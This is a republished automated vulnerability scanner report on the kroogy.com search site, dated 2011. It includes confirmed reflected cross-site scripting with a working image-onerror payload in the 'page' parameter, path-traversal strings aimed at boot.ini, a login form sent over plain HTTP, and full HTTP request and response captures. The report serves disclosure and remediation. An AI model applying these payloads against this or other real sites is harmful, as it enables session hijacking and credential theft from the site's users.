XSS, Cross Site Scripting in kroogy.com, CWE-79, CAPEC-86, DORK, GHDB REPORT SUMMARY

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog
Loading

Netsparker - Scan Report Summary
TARGET URL
http://kroogy.com/
SCAN DATE
4/24/2011 7:34:39 AM
REPORT DATE
4/24/2011 10:38:51 AM
SCAN DURATION
01:33:46

Total Requests

14051

Average Speed

2.50 req/sec.
19
identified
9
confirmed
0
critical
6
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
37 %
LOW
32 %
INFORMATION
32 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/ Apache Version Disclosure No
PHP Version Disclosure No
/index.php page GET Cross-site Scripting Yes
Cookie Not Marked As HttpOnly Yes
/index/index.php page GET Cross-site Scripting Yes
/pub/ Password Transmitted Over HTTP Yes
Auto Complete Enabled Yes
/search/web exactphrase POST [Probable] Local File Inclusion No
search GET [Probable] Local File Inclusion No
search POST [Possible] Internal IP Address Leakage No
E-mail Address Disclosure No
search GET Redirect Response BODY Is Too Large Yes
[Possible] Internal Path Leakage (*nix) No
[Possible] Internal Path Leakage (Windows) No
/search/web/index.php page GET Cross-site Scripting Yes
/search/web/Linkbucks%20vlad%20modelS [Possible] Local File Inclusion No
[Possible] Internal Path Leakage (*nix) No
/search/www.ecokids.ca/pub/eco_info/topics/climate/adaptations/ Internal Server Error Yes
/userdata/ Forbidden Resource Yes
Cross-site Scripting

Cross-site Scripting

3 TOTAL
IMPORTANT
CONFIRMED
3
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /index.php

/index.php CONFIRMED

http://kroogy.com/index.php?page=%3E%3CiMg%20src=N%20onerror=alert(9)%3E&type=3

Parameters

Parameter Type Value
page GET ><iMg src=N onerror=alert(9)>
type GET 3

Request

GET /index.php?page=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&type=3 HTTP/1.1
Referer: http://kroogy.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: kroogy.com
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; region=%27%2BNSFTW%2B%27; PHPSESSID=totjukp6oqa5l5opadu8gndj05; language=%2A%2Fnetsparker%280x000055%29%3B%2F%2A; theme=%27%2BNSFTW%2B%27
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:54:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6,PleskLin
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 782
Connection: close
Content-Type: text/html


<html> <head><meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0"> <style> <!-- .nesoternd { padding: 0px;margin:0 0px; background-color: #FFF; } .top, .bottom {display:block; background:transparent; font-size:1px;} .tb1, .tb2, .tb3, .tb4 {display:block; overflow:hidden;} .tb1, .tb2, .tb3 {height:1px;} .tb2, .tb3, .tb4 {background:#dce7fd; border-left:1px solid #0099FF; border-right:1px solid #0099FF;} .tb1 {margin:0 4px; background:#0099FF;} .tb2 {margin:0 3px; border-width:0 2px;} .tb3 {margin:0 2px; border-width:0 1px;} .tb4 {height:2px; margin:0 1px;} .bb1, .bb2, .bb3, .bb4 {display:block; overflow:hidden;} .bb1, .bb2, .bb3 {height:1px;} .bb2, .bb3, .bb4 { background:#dce7fd;border-left:1px solid #0099FF; border-right:1px solid #0099FF;} .bb1 {margin:0 4px; background:#0099FF; border-width:0 1px;} .bb2 {margin:0 3px; border-width:0 2px;} .bb3 {margin:0 2px; border-width:0 1px;} .bb4 {height:2px; margin:0 1px;} .parenttable { background:#dce7fd; border-style:solid; border-color: blue; border-width:0 1px; padding: 5px;margin:0 0px;} --> </style> </head> <body> <center> <table> <tr> <td> <div class="nesoternd" > <b class="top"> <b class="tb1"></b> <b class="tb2"></b> <b class="tb3"></b> <b class="tb4"></b> </b> <table border="0" class="parenttable" width="100%"> <tr height="50"> <td valign="middle"><br><img src="images/err.gif"></td> <td valign="middle"><br><strong>Error: </strong>Requested page was not found!<br><strong>Details: </strong>Class <strong>><iMg src=N onerror=netsparker(9)>Controller</strong> not found!</td> </tr> <tr> <td colspan="2" align="center" align="left"><a href="index.php"><strong>Home</strong></a></td> </tr> </table> <b class="bottom"> <b class="bb4" ></b> <b class="bb3" ></b> <b class="bb2" ></b> <b class="bb1" ></b> </b> </div> </td> </tr> </table> </center> </body></html>
- /index/index.php

/index/index.php CONFIRMED

http://kroogy.com/index/index.php?page=%3E%3CiMg%20src=N%20onerror=alert(9)%3E&type=3

Parameters

Parameter Type Value
page GET ><iMg src=N onerror=alert(9)>
type GET 3

Request

GET /index/index.php?page=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&type=3 HTTP/1.1
Referer: http://kroogy.com/index/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: kroogy.com
Cookie: region=%2A%2Fnetsparker%280x0003A5%29%3B%2F%2A; language=%2A%2Fnetsparker%280x000396%29%3B%2F%2A; theme=%27%2BNSFTW%2B%27; nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; region=%27%2BNSFTW%2B%27; PHPSESSID=totjukp6oqa5l5opadu8gndj05; language=%2A%2Fnetsparker%280x000055%29%3B%2F%2A; theme=%27%2BNSFTW%2B%27
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 13:53:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6,PleskLin
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 782
Connection: close
Content-Type: text/html


<html> <head><meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0"> <style> <!-- .nesoternd { padding: 0px;margin:0 0px; background-color: #FFF; } .top, .bottom {display:block; background:transparent; font-size:1px;} .tb1, .tb2, .tb3, .tb4 {display:block; overflow:hidden;} .tb1, .tb2, .tb3 {height:1px;} .tb2, .tb3, .tb4 {background:#dce7fd; border-left:1px solid #0099FF; border-right:1px solid #0099FF;} .tb1 {margin:0 4px; background:#0099FF;} .tb2 {margin:0 3px; border-width:0 2px;} .tb3 {margin:0 2px; border-width:0 1px;} .tb4 {height:2px; margin:0 1px;} .bb1, .bb2, .bb3, .bb4 {display:block; overflow:hidden;} .bb1, .bb2, .bb3 {height:1px;} .bb2, .bb3, .bb4 { background:#dce7fd;border-left:1px solid #0099FF; border-right:1px solid #0099FF;} .bb1 {margin:0 4px; background:#0099FF; border-width:0 1px;} .bb2 {margin:0 3px; border-width:0 2px;} .bb3 {margin:0 2px; border-width:0 1px;} .bb4 {height:2px; margin:0 1px;} .parenttable { background:#dce7fd; border-style:solid; border-color: blue; border-width:0 1px; padding: 5px;margin:0 0px;} --> </style> </head> <body> <center> <table> <tr> <td> <div class="nesoternd" > <b class="top"> <b class="tb1"></b> <b class="tb2"></b> <b class="tb3"></b> <b class="tb4"></b> </b> <table border="0" class="parenttable" width="100%"> <tr height="50"> <td valign="middle"><br><img src="images/err.gif"></td> <td valign="middle"><br><strong>Error: </strong>Requested page was not found!<br><strong>Details: </strong>Class <strong>><iMg src=N onerror=netsparker(9)>Controller</strong> not found!</td> </tr> <tr> <td colspan="2" align="center" align="left"><a href="index.php"><strong>Home</strong></a></td> </tr> </table> <b class="bottom"> <b class="bb4" ></b> <b class="bb3" ></b> <b class="bb2" ></b> <b class="bb1" ></b> </b> </div> </td> </tr> </table> </center> </body></html>
- /search/web/index.php

/search/web/index.php CONFIRMED

http://kroogy.com/search/web/index.php?page=%3E%3CiMg%20src=N%20onerror=alert(9)%3E&type=3

Parameters

Parameter Type Value
page GET ><iMg src=N onerror=alert(9)>
type GET 3

Request

GET /search/web/index.php?page=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&type=3 HTTP/1.1
Referer: http://kroogy.com/search/web/LS%20magazine
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: kroogy.com
Cookie: language=8; region=BE-nl; nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; region=%27%2BNSFTW%2B%27; PHPSESSID=totjukp6oqa5l5opadu8gndj05; language=%2A%2Fnetsparker%280x000055%29%3B%2F%2A; theme=%27%2BNSFTW%2B%27
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 14:08:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6,PleskLin
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 782
Connection: close
Content-Type: text/html


<html> <head><meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0"> <style> <!-- .nesoternd { padding: 0px;margin:0 0px; background-color: #FFF; } .top, .bottom {display:block; background:transparent; font-size:1px;} .tb1, .tb2, .tb3, .tb4 {display:block; overflow:hidden;} .tb1, .tb2, .tb3 {height:1px;} .tb2, .tb3, .tb4 {background:#dce7fd; border-left:1px solid #0099FF; border-right:1px solid #0099FF;} .tb1 {margin:0 4px; background:#0099FF;} .tb2 {margin:0 3px; border-width:0 2px;} .tb3 {margin:0 2px; border-width:0 1px;} .tb4 {height:2px; margin:0 1px;} .bb1, .bb2, .bb3, .bb4 {display:block; overflow:hidden;} .bb1, .bb2, .bb3 {height:1px;} .bb2, .bb3, .bb4 { background:#dce7fd;border-left:1px solid #0099FF; border-right:1px solid #0099FF;} .bb1 {margin:0 4px; background:#0099FF; border-width:0 1px;} .bb2 {margin:0 3px; border-width:0 2px;} .bb3 {margin:0 2px; border-width:0 1px;} .bb4 {height:2px; margin:0 1px;} .parenttable { background:#dce7fd; border-style:solid; border-color: blue; border-width:0 1px; padding: 5px;margin:0 0px;} --> </style> </head> <body> <center> <table> <tr> <td> <div class="nesoternd" > <b class="top"> <b class="tb1"></b> <b class="tb2"></b> <b class="tb3"></b> <b class="tb4"></b> </b> <table border="0" class="parenttable" width="100%"> <tr height="50"> <td valign="middle"><br><img src="images/err.gif"></td> <td valign="middle"><br><strong>Error: </strong>Requested page was not found!<br><strong>Details: </strong>Class <strong>><iMg src=N onerror=netsparker(9)>Controller</strong> not found!</td> </tr> <tr> <td colspan="2" align="center" align="left"><a href="index.php"><strong>Home</strong></a></td> </tr> </table> <b class="bottom"> <b class="bb4" ></b> <b class="bb3" ></b> <b class="bb2" ></b> <b class="bb1" ></b> </b> </div> </td> </tr> </table> </center> </body></html>
Password Transmitted Over HTTP

Password Transmitted Over HTTP

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic he/she can steal users credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /pub/

/pub/ CONFIRMED

http://kroogy.com/pub/

Form target action

mshtml.HTMLInputElementClass

Request

GET /pub/ HTTP/1.1
Referer: http://kroogy.com/pub/banner_728_90_random.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: kroogy.com
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; language=8; region=BE-nl
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:35:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6,PleskLin
Set-Cookie: PHPSESSID=totjukp6oqa5l5opadu8gndj05; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 440
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>Start Page</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><link rel="stylesheet" type="text/css" href="Colorful.css" /></head><body><h3 align="center">Please select a table to work with</h3> <table align="center" cellpadding="2" cellspacing="2"> <form action="login.php" method="post"> <tr><td>Username </td><td><input type="text" name="USERNAME"></td></tr> <tr><td>Password </td><td><input type="password" name="PASSWORD"></td></tr> <tr><td>&nbsp;</td><td><input type="submit" name="ACTION" value="Login"</td></tr> </form> </table>
[Probable] Local File Inclusion

[Probable] Local File Inclusion

2 TOTAL
IMPORTANT
A Local File Inclusion (LFI) vulnerability occurs when a file from the target system is injected into attacked server page. Even though Netsparker believes that there is a Local File Inclusion in here it could not confirm it.

Impact

Impact can differ based on the exploitation and the read permission of the web server user. Depending on these factors an attacker might carry out one or more of the following attacks:

Remedy

- /search/web

/search/web

http://kroogy.com/search/web?search=3%22../../../../../../../../../../boot.ini%00%22%20site:3%20NOT%..

Parameters

Parameter Type Value
search GET 3"../../../../../../../../../../boot.ini " site:3 NOT site:3 NOT 3
type GET web

Request

GET /search/web?search=3%22../../../../../../../../../../boot.ini%00%22%20site:3%20NOT%20site:3%20NOT%203&type=web HTTP/1.1
Referer: http://kroogy.com/index/processadvancesearch
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: kroogy.com
Cookie: language=8; region=AU-en; nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; region=%27%2BNSFTW%2B%27; PHPSESSID=totjukp6oqa5l5opadu8gndj05; language=%2A%2Fnetsparker%280x000055%29%3B%2F%2A; theme=%27%2BNSFTW%2B%27
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 13:19:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6,PleskLin
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 8812
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><SCRIPT LANGUAGE="JavaScript">function showcheckbox(){ if(document.getElementById('thumbshotcheck').checked==true) { SetCookie( 'thumbshot', 'on', 7); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display=""; } } else { SetCookie( 'thumbshot', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display="none"; }}}function showcheckbox1(){if(document.getElementById('quicklookcheck').checked==true) { SetCookie( 'qlook', 'on', 7); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display=""; document.getElementById("qlookframe"+i).style.display=""; } } else { SetCookie( 'qlook', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display="none"; document.getElementById("qlookframe"+i).style.display="none"; }}}</script><title>Kroogy Search - வலை - 3&quot;../../../../../../../../../../boot.ini &quot; site:3 NOT site:3 NOT 3</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta name="description" content="Kroogy Search - வலை - 3&quot;../../../../../../../../../../boot.ini &quot; site:3 NOT site:3 NOT 3"><meta name="keywords" content="Kroogy Search,search,search engine,3&quot;../../../../../../../../../../boot.ini &quot; site:3 NOT site:3 NOT 3,web"><style type="text/css"><!--body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--></style></head><body><table cellpadding="0" cellspacing="0" border="0" class="headertable" width="100%"><tr><td class="headerlinkstd" align="right"><span style="float:left;"><form name="displaysettings" id="displaysettings" enctype="multipart/form-data" method="post" action="http://kroogy.com/"> <input type="checkbox" name="thumbshotcheck" id="thumbshotcheck" checked="checked" onchange="javascript:showcheckbox()" > &nbsp;பெருவிரல்சுவடை காமி
&nbsp;&nbsp; <input type="checkbox" name="quicklookcheck" id="quicklookcheck" checked="checked" onchange="javascript:showcheckbox1()"> &nbsp;உள்பார்வை காமி </form></span><a class="headerlink" href="http://kroogy.com/index/advanced">மேம்பட்ட தேடல்</a> | <a class="headerlink" href="http://kroogy.com/">Kroogy Search முகப்பு</a></td></tr><tr><td><style><!---->.links{font-size:11px;color: grey;width: 125px;}.outermainadtd1{padding-top:10px;padding-left:0px;padding-right:10px;vertical-align:top;}.resultsetwrappertd{padding-right:50px;}</style><script src="js/qlook.js" language="JavaScript"></script><SCRIPT LANGUAGE="JavaScript">function SetCookie(cookieName,cookieValue,nDays) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires="+expire.toGMTString();}function urlencode(str){return escape(str).replace(/\+/g,'%2B').replace(/%20/g, '+').replace(/\*/g, '%2A').replace(/\//g, '%2F').replace(/@/g, '%40');}function popUp(URL){day = new Date();id = day.getTime();var returnurl="http://kroogy.com/search/emailafriend?url="+urlencode(URL);eval("page" + id + " = window.open(returnurl, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=605,height=400,left = 520,top = 150');");}</script><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr> <td align="left" class="outermainlogotd" ><a alt="Kroogy Search முகப்பு" title="Kroogy Search முகப்பு" href="http://kroogy.com/"> <img src="userdata/resultpagelogo.jpg" border="0"> </a></td> <td align="left" class="outermaintabtd"><script language="javascript"> function Determine(type,status){var term=document.getElementById('search').value;term=term.replace(/%/g, "%25");term=term.replace(/&/g, "%26");term=term.replace(/\+/g, "%2B");term=term.replace(/\//g, "%2F");term=term.replace(/#/g, "%23");if(term!=""){window.location="index.php?page=search/redir&type="+type+"&search="+term;}if(status=="0" && term=="")window.location="index.php?type="+type; }</script><script type="text/javascript">// JavaScript Documentvar xmlhttp;function showResult(str){ if (str.length==0) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; return; }xmlhttp=GetXmlHttpObject()if (xmlhttp==null) { alert ("Your browser does not support XML HTTP Request"); return; } document.getElementById("livesearch").style.padding="0px";type=document.searchform.type.value;var url="http://kroogy.com/index/livesearch";url=url+"&q="+str;url=url+"&type="+type;xmlhttp.onreadystatechange=stateChanged ;xmlhttp.open("GET",url,true);xmlhttp.send(null);}function stateChanged(){ if (xmlhttp.readyState==4) { document.getElementById("livesearch").innerHTML=xmlhttp.responseText; if(xmlhttp.responseText!="") { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; } else { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; } }}function GetXmlHttpObject(){if (window.XMLHttpRequest) { // code for IE7+, Firefox, Chrome, Opera, Safari return new XMLHttpRequest(); }if (window.ActiveXObject) { // code for IE6, IE5 return new ActiveXObject("Microsoft.XMLHTTP"); }return null;}function setvaluefortb(text){ document.getElementById('search').value=text; document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.searchform.submit();}document.body.onclick= getMouseXY;function getMouseXY(e) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px";}var searchtext="";var counter=0;var old_char_count=0;var total_result_count=10;function keymovement(evt,textval) { var charCode = (evt.which) ? evt.which : event.keyCode //alert(charCode); if(charCode==40) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter+1; if(!document.getElementById('livesearch_a_'+counter)) { counter=0; } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==38) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter-1; if(!document.getElementById('livesearch_a_'+counter) && counter!=0) { for(i=total_result_count;i>0;i--) { if(document.getElementById('livesearch_a_'+i)) { counter=i; break; } } } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==37 || charCode==39 || charCode==17 || charCode==18) { } else if(charCode==27 ) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.getElementById('search').value=searchtext; } else if(charCode==13 ) { document.searchform.submit(); } else { searchtext=document.getElementById('search').value; showResult(textval); } }</script><style type="text/css"></style><form name="searchform" id="searchform" enctype="multipart/form-data" method="POST" action="http://kroogy.com/search/redir"><div class="containerdiv"><table cellpadding="0 " cellspacing="0" class="containertable"><tr><td class="containertabtd"><div class="tabsdiv"><div class="tabsdivinner"><table cellpadding="0" cellspacing="0" class="tabstable"><tr class="tabstr"> <td class="activetableft">&nbsp;</td> <td nowrap="nowrap" class="activetabcenter"><a class="activetablink" href="javascript:Determine('web','1');"><span>வலை</span></a></td> <td class="activetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('images','0');"><span>படம்</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('videos','0');"><span>ஒளி</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('news','0');"><span>செய்தி</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('sports','0');"><span>விளையாட்டு</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Audio','0');"><span>ஒலி</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Forum','0');"><span>போரும்</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Blog','0');"><span>இடுகை</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Wiki','0');"><span>விக்கிபீடியா</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('PDF','0');"><span>பிடியஃப்</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Amazon','0');"><span>Amazon</span></a></td> <td class="inactivetabright">&nbsp;</td></tr></table></div></div></td></tr><tr><td class="containersearchtd"><div class="searchdiv"><table cellpadding="0" cellspacing="0" class="searchtable" border="0"><tr><td class="searchtdleft">&nbsp;</td><td nowrap="nowrap" class="searchtdcenter" dir="ltr"><table cellpadding="0" cellspacing="0"><tr><td colspan="3" > <span class="searchfieldspan"><input type="hidden" name="type" value="web"><input autocomplete="off" onKeyUp="javascript:keymovement(event,this.value);" name="search" id="search" type="text" value="3&quot;../../../../../../../../../../boot.ini &quot; site:3 NOT site:3 NOT 3" size="50" class="searchfield"></span><span class="searchbuttonspan"><input type="submit" name="searchbutton" value="தேடு" class="searchbutton"></span><span class="luckybuttonspan"><input type="submit" name="lucky" value="அதிர்ஷ்டம் என் பக்கம்" class="luckybutton"></span></td></tr><tr><td style="overflow:visible; width:380px;" valign="top" ><div id="livesearch" class="livesearch" ></div></td><td>&nbsp;</td><td>&nbsp;</td></tr></table></td><td class="searchtdright">&nbsp;</td></tr></table></div></td></tr></table></div></form> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> </td> </tr></table><table cellpadding="0" cellspacing="0" border="0" class="outermaincontainer"> <tr> <td colspan="2"> <table border="0" cellpadding="0" cellspacing="0" class="totaltable"> <tr> <td class="totaltd" align="left"><span class="totaltext">க்கான ஏறக்குறைய <span class="totalresults">4,460,000</span> இல் <span class="resultcountstart">1</span>-<span class="resultcountend">10</span> முடிவுகள்</span></td> <td class="typesearch..
- /search/web

/search/web

http://kroogy.com/search/web?search=../../../../../../../../../../boot.ini&type=web&startpage=2

Parameters

Parameter Type Value
search GET ../../../../../../../../../../boot.ini
type GET web
startpage GET 2

Request

GET /search/web?search=../../../../../../../../../../boot.ini&type=web&startpage=2 HTTP/1.1
Referer: http://kroogy.com/search/web/LS%20magazine
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: kroogy.com
Cookie: language=8; region=AU-en; nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; region=%27%2BNSFTW%2B%27; PHPSESSID=totjukp6oqa5l5opadu8gndj05; language=%2A%2Fnetsparker%280x000055%29%3B%2F%2A; theme=%27%2BNSFTW%2B%27
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 14:15:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6,PleskLin
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 8698
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><SCRIPT LANGUAGE="JavaScript">function showcheckbox(){ if(document.getElementById('thumbshotcheck').checked==true) { SetCookie( 'thumbshot', 'on', 7); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display=""; } } else { SetCookie( 'thumbshot', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display="none"; }}}function showcheckbox1(){if(document.getElementById('quicklookcheck').checked==true) { SetCookie( 'qlook', 'on', 7); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display=""; document.getElementById("qlookframe"+i).style.display=""; } } else { SetCookie( 'qlook', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display="none"; document.getElementById("qlookframe"+i).style.display="none"; }}}</script><title>Kroogy Search - வலை - ../../../../../../../../../../boot.ini</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta name="description" content="Kroogy Search - வலை - ../../../../../../../../../../boot.ini"><meta name="keywords" content="Kroogy Search,search,search 